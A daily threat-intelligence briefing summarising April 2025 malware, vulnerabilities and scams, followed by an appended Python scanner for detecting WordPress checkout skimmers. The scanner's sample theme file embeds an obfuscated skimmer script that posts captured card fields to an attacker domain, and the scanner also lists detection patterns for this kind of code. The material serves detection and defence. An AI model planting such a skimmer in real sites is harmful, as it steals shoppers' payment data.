Cyware Daily Threat Intelligence, April 11, 2025


Daily Threat Briefing April 11, 2025

Bots don’t sleep and AkiraBot proves it. Since late 2024, this spam operation has flooded over 400,000 websites, zeroing in on small businesses using platforms like Shopify, Wix, and Squarespace. The messages push shady SEO services, powered by AI-generated content to dodge filters. With rotating domains, CAPTCHA bypass tools, and an expanding reach into live chats and comment sections, AkiraBot is becoming harder to pin down.

One bug, admin access - just like that. A critical flaw in the OttoKit WordPress plugin is being actively exploited, allowing attackers to create admin accounts and take over sites. Only some configurations are vulnerable, but where it hits, it hits hard.

When a checkout page starts asking for your card details twice, something’s wrong. A WordPress site was found hosting a fake credit card form. The malicious script captured payment info and funneled it to a freshly registered domain, designed to look harmless, but built to steal.

Top Malware Reported in the Last 24 Hours

Malicious npm package targets Exodus and Atomic

ReversingLabs discovered a malicious npm package, pdf-to-office, that targets Atomic and Exodus crypto wallet users. This package, which appears to convert PDF files to Microsoft Office documents, actually deploys a malicious payload that modifies key files within the wallet software. This allows attackers to intercept cryptocurrency transfers by silently swapping recipient wallet addresses. The malware remains persistent even after the removal of the package, requiring a complete reinstallation of the affected wallet software.

Newly registered domains drop SpyNote

Cybersecurity researchers have discovered that threat actors are creating deceptive websites to spread the SpyNote Android malware. These websites pretend to be Google Play Store pages for popular apps, tricking users into downloading the malware. The malware, also known as SpyMax, steals sensitive data from infected devices and has been linked to a Chinese-speaking threat actor named GoldFactory. It has also been adopted by state-sponsored hacking groups. The malware has been found to be spread through carousel images that download a malicious APK file onto the user's device.

AkiraBot evades CAPTCHA in new spam campaign

A massive new spam campaign by AkiraBot has been discovered. This campaign has targeted over 400,000 websites, with a focus on small and medium-sized businesses hosted on platforms like Shopify, Wix, and Squarespace. The spam messages promote suspicious SEO services called Akira and ServiceWrap. The campaign uses content generated by an OpenAI LLM, which helps it evade spam filters because the content is unique each time. The framework also rotates the attacker-controlled domains mentioned in the messages, further complicating spam filtering. Since September 2024, AkiraBot has successfully spammed 80,000 websites. It has evolved to target live chat widgets and comment sections, and it uses CAPTCHA bypass services and multiple proxy hosts to avoid detection.

Top Vulnerabilities Reported in the Last 24 Hours

OttoKit plugin flaw actively exploited

A high-severity security vulnerability (CVE-2025-3102) in the OttoKit (formerly SureTriggers) plugin for WordPress has been actively exploited within hours of its public disclosure. The authorization bypass bug allows attackers to create administrator accounts under certain conditions and take control of vulnerable websites. The flaw was addressed in version 1.0.79. Successful exploitation could lead to complete site control, unauthorized plugin uploads, malware and spam injection, and redirection to malicious websites. Although the plugin has over 100,000 active installations, only a subset of websites is exploitable.

Microsoft issues emergency fix

Microsoft has released an urgent patch, KB5002623, for Office 2016 to fix a critical issue causing applications like Word, Excel, and Outlook to crash. This issue was introduced by a previous update, KB5002700, and affects the Microsoft Installer (.msi) version of Office 2016, not the Click-to-Run editions. Users are advised to install both updates to resolve the problem. The patch is available for manual download from the Microsoft Download Center, with separate files for 32-bit and 64-bit systems. Microsoft assures users that the update is safe and has been scanned for viruses. If users encounter issues after installation, they can uninstall the update through the Control Panel. Microsoft encourages all Office 2016 users to install these updates promptly to ensure a stable experience.

Critical bugs in several ICS devices

Multiple ICS devices from Rockwell Automation, Hitachi Energy, and Inaba Denki Sangyo have critical vulnerabilities with CVSS base scores of up to 9.9. Cyble has urged users to patch these vulnerabilities, which affect products like Rockwell Automation Industrial Data Center, Hitachi Energy MicroSCADA Pro/X SYS600, and Inaba Denki Sangyo CHOCO TEI WATCHER mini industrial cameras. The identified vulnerabilities include CVE-2025-23120, CVE-2025-25211, CVE-2025-26689, CVE-2024-4872, and CVE-2024-3980, with potential risks ranging from remote code execution and unauthorized access to data tampering and session hijacking.

Top Scams Reported in the Last 24 Hours

Fake font domains facilitate card theft

A Sucuri client's WordPress site was found to have a suspicious credit card form and an unfamiliar domain, italicfonts[.]org, on the checkout page. Upon investigation, a heavily obfuscated script was found in the theme's footer.php file; it contained the suspicious domain and the elements of a credit card form. The malware worked by injecting a script into the checkout page, creating a fake credit card form, capturing the card details entered into it, and sending them to the attacker's server. The domain had been registered recently, had no indexed results, and appeared only inside the fake form. The fake form was designed to mimic real payment fields to avoid detection.
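A defender-side check for the pattern described above, as an added example that is not part of the original briefing or of Sucuri's tooling: it scans a theme file for inline scripts that combine an unknown exfiltration domain, obfuscation markers, and checkout or card-field references. The sample footer.php, the allowlisted CDN domain, and the scoring weights are constructed assumptions; flagged domains are reported defanged.

```python
import re

# Constructed sample of a theme footer.php with an injected inline skimmer script.
# The obfuscation markers and exfiltration domain model the incident described above.
SAMPLE_FOOTER_PHP = """<?php wp_footer(); ?>
<script src="https://cdn.example-shop.test/theme.js"></script>
<script>
var _0x4f=["\\x63\\x63\\x2d\\x6e\\x75\\x6d\\x62\\x65\\x72"];
if(location.href.indexOf('checkout')>-1){
  var f=document.createElement('form');
  f.innerHTML=unescape('%3Cinput%20name%3D%22cc-number%22%3E');
  fetch('https://italicfonts.org/font.php',{method:'POST',body:new FormData(f)});
}
</script>
</body></html>"""

# Assumption: the site operator maintains this allowlist of domains the theme may load from.
ALLOWED_DOMAINS = {"cdn.example-shop.test"}
OBFUSCATION_MARKERS = ("unescape(", "eval(", "String.fromCharCode", "atob(")
PAYMENT_HINTS = ("checkout", "cc-number", "cvv", "cardnumber")
DOMAIN_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)

def defang(domain):
    """Render a domain as it should appear in a report, e.g. italicfonts[.]org."""
    return domain.replace(".", "[.]")

def scan_theme_file(html):
    """Return unknown external script domains and inline scripts that look like a skimmer."""
    report = {"unknown_src_domains": [], "suspicious_inline": []}
    for src in re.findall(r"<script[^>]*\bsrc=[\"']?https?://([a-z0-9.-]+)", html, re.I):
        if src.lower() not in ALLOWED_DOMAINS:
            report["unknown_src_domains"].append(defang(src))
    for m in re.finditer(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", html, re.S | re.I):
        body = m.group(1)
        unknown = sorted(defang(d) for d in set(DOMAIN_RE.findall(body))
                         if d.lower() not in ALLOWED_DOMAINS)
        markers = [k for k in OBFUSCATION_MARKERS if k in body]
        hex_escapes = len(re.findall(r"\\x[0-9a-f]{2}", body, re.I))
        hints = [h for h in PAYMENT_HINTS if h in body.lower()]
        # Weighted score: an unknown domain contacted from an obfuscated script that
        # touches checkout/card fields is the signature of the fake-form skimmer.
        score = 3 * len(unknown) + 2 * len(markers) + (2 if hex_escapes >= 8 else 0) + len(hints)
        if score >= 5:
            report["suspicious_inline"].append({"domains": unknown, "markers": markers,
                                                "hex_escapes": hex_escapes,
                                                "payment_hints": hints, "score": score})
    return report

if __name__ == "__main__":
    print(scan_theme_file(SAMPLE_FOOTER_PHP))
```

Run it against each PHP template of the active theme; a clean file yields empty lists, and any hit should be compared against a known-good copy of the theme before the file is restored.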
